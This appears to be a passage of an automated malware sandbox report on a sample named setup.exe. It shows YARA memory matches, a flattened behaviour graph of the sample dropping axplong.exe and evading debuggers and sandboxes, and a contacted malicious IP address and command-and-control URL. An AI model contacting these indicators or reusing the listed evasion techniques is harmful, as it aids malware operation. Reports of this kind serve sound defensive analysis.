Source: Yara match File source: 00000000.00000002.2128912313.0000000000191000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2166411163.0000000000501000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2157568519.0000000000501000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2116812942.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2088563271.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483209 Sample: setup.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 23 15.164.165.52.in-addr.arpa 2->23 35 Found malware configuration 2->35 37 Antivirus detection for URL or domain 2->37 39 Antivirus / Scanner detection for submitted sample 2->39 41 5 other signatures 2->41 7 setup.exe 5 2->7         started        11 axplong.exe 12 2->11         started        14 axplong.exe 2->14         started        signatures3 process4 dnsIp5 19 C:\Users\user\AppData\Local\...\axplong.exe, PE32 7->19 dropped 21 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 7->21 dropped 43 Detected unpacking (changes PE section rights) 7->43 45 Tries to evade debugger and weak emulator (self modifying code) 7->45 47 Tries to detect virtualization through RDTSC time measurements 7->47 16 axplong.exe 7->16         started        25 185.215.113.16, 49699, 49700, 49701 WHOLESALECONNECTIONSNL Portugal 11->25 49 Hides threads from debuggers 11->49 51 Tries to detect sandboxes / dynamic malware analysis system (registry check) 11->51 53 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 11->53 file6 signatures7 process8 signatures9 27 Antivirus detection for dropped file 16->27 29 Detected unpacking (changes PE section rights) 16->29 31 Tries to detect sandboxes and other dynamic analysis tools (window names) 16->31 33 6 other signatures 16->33
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted Domains

Name IP Active
15.164.165.52.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.16/Jo89Ku7d/index.php true
  • Avira URL Cloud: phishing
 unknown